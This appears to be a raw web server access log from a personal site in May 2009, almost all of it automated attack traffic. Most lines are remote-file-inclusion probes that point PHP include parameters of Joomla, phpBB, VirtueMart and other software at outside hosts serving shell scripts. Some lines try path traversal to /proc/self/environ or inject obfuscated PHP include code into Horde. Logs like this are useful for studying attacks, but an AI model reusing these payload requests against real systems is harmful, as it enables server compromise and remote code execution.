218.27.203.107 - - [19/May/2009:10:05:52 -0700] "GET /logs/access_081122.log//inc/header.php/step_one.php?server_inc=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:05:52 -0700] "GET /inc/header.php/step_one.php?server_inc=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:05:57 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:06:00 -0700] "GET /logs/access_090319.log//inc/header.php/step_one.php?server_inc=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:06:03 -0700] "GET /logs/access_081116.log//appserv/main.php?appserv_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:06:03 -0700] "GET /appserv/main.php?appserv_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:06:03 -0700] "GET /logs//appserv/main.php?appserv_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:06:03 -0700] "GET /logs/access_090112.log//appserv/main.php?appserv_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.80.2 - - [19/May/2009:10:06:13 -0700] "GET /index.php?DOCUMENT_ROOT=http://ecology45.t35.com/idv6.txt??? HTTP/1.1" 200 41938 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.15.242 - - [19/May/2009:10:06:16 -0700] "GET /?path%5Bdocroot%5D=http://www.tkcchoir.org/xml/pw.txt??? HTTP/1.1" 200 42069 "-" "libwww-perl/5.805" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:06:17 -0700] "GET /logs/access_090319.log//inc/header.php/step_one.php?server_inc=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:06:18 -0700] "GET /logs/access_090319.log%20%20//inc/header.php/step_one.php?server_inc=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.202.4.158 - - [19/May/2009:10:06:19 -0700] "GET /logs/access_080929.log//modules/vwar/admin/admin.php?vwar_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
91.202.4.158 - - [19/May/2009:10:06:19 -0700] "GET /logs/access_080929.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
91.202.4.158 - - [19/May/2009:10:06:20 -0700] "GET /logs/access_080929.log//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [19/May/2009:10:06:20 -0700] "GET /logs/access_080929.log//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:06:32 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 42073 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:06:32 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 42073 "-" "libwww-perl/5.812" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:06:34 -0700] "GET /logs/access_090126.log%20%20//guestbook1//admin.php?include_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:06:34 -0700] "GET /logs/access_090315.log%20%20//guestbook1//admin.php?include_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:10:06:53 -0700] "GET /logs/access_081116.log//appserv/main.php?appserv_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:10:06:53 -0700] "GET /appserv/main.php?appserv_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:10:06:54 -0700] "GET /logs//appserv/main.php?appserv_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:10:06:54 -0700] "GET /logs/access_090112.log//appserv/main.php?appserv_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:07:37 -0700] "GET /logs/access_080513.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.eifel-karneval.de/schneifelnarren/wartung/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:07:38 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.eifel-karneval.de/schneifelnarren/wartung/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:07:38 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.eifel-karneval.de/schneifelnarren/wartung/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:07:38 -0700] "GET /logs/access_080513.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.eifel-karneval.de/schneifelnarren/wartung/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:07:39 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.eifel-karneval.de/schneifelnarren/wartung/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:07:40 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.eifel-karneval.de/schneifelnarren/wartung/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.79.47.122 - - [19/May/2009:10:07:44 -0700] "GET /administrator/components/com_virtuemart/export.php?mosconfig_absolute_path=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [19/May/2009:10:07:44 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosconfig_absolute_path=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [19/May/2009:10:07:44 -0700] "GET /logs/access_080616.log//administrator/components/com_virtuemart/export.php?mosconfig_absolute_path=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:07:45 -0700] "GET /logs/access_081008.log/index.php?screen=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:07:47 -0700] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tkcchoir.org/xml/bot.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:07:47 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tkcchoir.org/xml/bot.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:07:48 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tkcchoir.org/xml/bot.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.126.110.134 - - [19/May/2009:10:07:49 -0700] "GET /logs/access_080706.log%20%20//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.126.110.134 - - [19/May/2009:10:07:49 -0700] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.126.110.134 - - [19/May/2009:10:07:49 -0700] "GET /logs/access_090203.log%20%20//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.126.110.134 - - [19/May/2009:10:07:49 -0700] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:10:07:49 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
222.122.26.5 - - [19/May/2009:10:07:50 -0700] "GET /logs/access_080313.log/index2.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:07:50 -0700] "GET /logs/index.php?screen=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:07:51 -0700] "GET /logs/access_090214.log/index.php?screen=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:10:08:00 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:10:08:14 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
151.1.154.24 - - [19/May/2009:10:08:15 -0700] "GET /logs/access_081201.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.canalpriv8.xpg.com.br/FX29ID.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [19/May/2009:10:08:17 -0700] "GET /logs/access_090117.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.canalpriv8.xpg.com.br/FX29ID.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [19/May/2009:10:08:31 -0700] "GET /logs/access_090408.log//administrator/components/com_virtuemart/export.php?mosconfig_absolute_path=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [19/May/2009:10:08:37 -0700] "GET /logs/access_090315.log%20%20//guestbook1//admin.php?include_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:08:38 -0700] "GET /index.php?screen=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 200 41973 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:08:41 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:08:41 -0700] "GET /logs/access_081201.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:08:41 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [19/May/2009:10:08:42 -0700] "GET /logs/access_090126.log%20%20//guestbook1//admin.php?include_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:10:08:44 -0700] "GET /logs/access_090316.log//modules/Forums/admin/admin_words.php?phpbb_root_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:10:08:44 -0700] "GET /modules/Forums/admin/admin_words.php?phpbb_root_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:10:08:44 -0700] "GET /logs//modules/Forums/admin/admin_words.php?phpbb_root_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.80.2 - - [19/May/2009:10:08:45 -0700] "GET /logs/access_081012.log%20//index.php?DOCUMENT_ROOT=http://ecology45.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.80.2 - - [19/May/2009:10:08:45 -0700] "GET /logs/access_081008.log%20//index.php?DOCUMENT_ROOT=http://ecology45.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:08:47 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 42073 "-" "libwww-perl/5.812" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:10:08:49 -0700] "GET /logs/access_090311.log//modules/Forums/admin/admin_words.php?phpbb_root_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:10:08:51 -0700] "GET /logs/access_080331.log//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/gie.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:08:53 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 42073 "-" "libwww-perl/5.812" "www.dmulk.com"
82.159.191.105 - - [19/May/2009:10:08:55 -0700] "GET /logs/access_080222.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ilan-lar.com/data/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.159.191.105 - - [19/May/2009:10:08:55 -0700] "GET /logs/access_090217.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ilan-lar.com/data/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.159.191.105 - - [19/May/2009:10:08:56 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ilan-lar.com/data/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.159.191.105 - - [19/May/2009:10:08:56 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ilan-lar.com/data/idfx1.txt? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:08:56 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.eifel-karneval.de/schneifelnarren/wartung/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:08:56 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.eifel-karneval.de/schneifelnarren/wartung/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:09:02 -0700] "GET /logs/access_071223.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:09:02 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:09:03 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.255.190.20 - - [19/May/2009:10:09:08 -0700] "GET /robots.txt HTTP/1.0" 200 36 "http://www.dmulk.com/logs/access_081010.log" "Mozilla/5.0 (compatible; heritrix/2.0.1 +http://fake.example.com/crawlerselftest/)" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:10:09:13 -0700] "GET /logs/access_090120.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:09:13 -0700] "GET /logs/access_090117.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.255.190.20 - - [19/May/2009:10:09:19 -0700] "GET /logs/access_081010.log HTTP/1.0" 200 4954020 "http://guide.opendns.com/track/click.php?q=motors%20viewitem%20paymentcalculator&curl=http://www.dmulk.com/logs/access_081010.log&search_grp=MAINRESULTS&search_pos=3" "Mozilla/5.0 (compatible; heritrix/2.0.1 +http://fake.example.com/crawlerselftest/)" "www.dmulk.com"
91.121.210.42 - - [19/May/2009:10:09:19 -0700] "GET /logs/access_090315.log%20%20//guestbook1//admin.php?include_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [19/May/2009:10:09:19 -0700] "GET /logs/access_090126.log%20%20//guestbook1//admin.php?include_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:10:09:27 -0700] "GET /logs/access_090119.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:09:34 -0700] "GET /logs/access_080723.log/config.php?rootBase=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:10:09:39 -0700] "GET /logs/access_080513.log//?_zb_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:10:09:39 -0700] "GET /?_zb_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 200 42080 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:10:09:39 -0700] "GET /logs//?_zb_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 200 100196 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:09:51 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:09:51 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:09:51 -0700] "GET /logs/access_071223.log%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:09:52 -0700] "GET /logs/access_080521.log%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:10:10:14 -0700] "GET /logs/access_090316.log%20%20//modules/Forums/admin/admin_words.php?phpbb_root_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:10:10:18 -0700] "GET /logs/access_090311.log%20%20//modules/Forums/admin/admin_words.php?phpbb_root_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:10:10:20 -0700] "GET /logs/access_081116.log/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:10:10:20 -0700] "GET /logs/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:10:10:20 -0700] "GET /errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:10:10:24 -0700] "GET /logs/access_080204.log/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:10:48 -0700] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tkcchoir.org/xml/bot.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:10:50 -0700] "GET /logs/access_080425.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.eifel-karneval.de/schneifelnarren/wartung/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:10:50 -0700] "GET /logs/access_080425.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.eifel-karneval.de/schneifelnarren/wartung/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:10:11:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:11:55 -0700] "GET /logs/access_080918.log//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:11:55 -0700] "GET /amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:11:55 -0700] "GET /logs//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:10:12:08 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
75.125.15.242 - - [19/May/2009:10:12:09 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.tkcchoir.org/xml/pw.txt??? HTTP/1.1" 200 100196 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.15.242 - - [19/May/2009:10:12:10 -0700] "GET /?path%5Bdocroot%5D=http://www.tkcchoir.org/xml/pw.txt??? HTTP/1.1" 200 42068 "-" "libwww-perl/5.805" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:12:32 -0700] "GET /?path%5Bdocroot%5D=http://www.tkcchoir.org/xml/roxx.jpg??? HTTP/1.1" 200 42071 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [19/May/2009:10:12:38 -0700] "GET /logs/index2.php?x=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [19/May/2009:10:12:38 -0700] "GET /index2.php?x=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:10:12:53 -0700] "GET /logs/access_081018.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:10:12:53 -0700] "GET /horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:10:12:53 -0700] "GET /logs//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:10:12:58 -0700] "GET /logs/access_081018.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:10:12:58 -0700] "GET /horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:10:12:59 -0700] "GET /logs//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.145.50 - - [19/May/2009:10:13:21 -0700] "GET /logs/access_080821.log//?custompluginfile[]=http://peek-a-moo.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
